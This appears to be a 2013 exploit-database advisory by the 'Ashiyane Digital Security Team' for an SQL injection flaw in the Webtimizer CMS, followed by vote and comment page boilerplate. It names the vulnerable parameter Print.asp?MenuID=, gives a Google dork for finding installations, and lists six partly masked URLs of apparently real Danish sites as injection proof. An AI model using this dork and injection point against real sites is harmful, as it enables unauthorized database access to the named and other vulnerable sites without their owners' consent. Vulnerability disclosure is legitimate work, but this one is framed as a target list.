Webtimizer Sql injection vulnerability

2013.09.03

Credit: Ashiyane Digital Security Team

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: intext:\"Powered by Webtimizer\"

#********************************************************************************
# [+] Exploit Title : Webtimizer Sql injection vulnerability
#*********************************************************************
# [+] Software link : http://webtimiser.dk
#*****************************************************************
# [+] Exploit Author : Ashiyane Digital Security Team
#****************************************************
# [+] Tested on: Windows 7 , Linux
#*********************************
# [+] Google Dork : intext:"Powered by Webtimizer"
#***********************************************************
# [+] Date: 2013/09/01
#*********************
--------------------------------------------------------------------
# [+] Exploit :
#
# [+] Location : [Target]/Print.asp?MenuID=[Sql Injection]
#
#-------
# Proof:
#-------
#
# http://www.kuXservering.dk/Print.asp?MenuID=1'
#
# http://www.XXlor.dk/Print.asp?MenuID=1'
#
# http://www.XX.dk/Print.asp?MenuID=1'
#
# http://wwXXXn.dk/Print.asp?MenuID=1'
#
# http://www.frXXer.dk/Print.asp?MenuID=1'
#
# http://www.hXXXne.dk/Print.asp?MenuID=1'
#
#
######################
discovered by : ACC3SS
######################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Webtimizer Sql injection vulnerability

Dork: intext:\"Powered by Webtimizer\"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.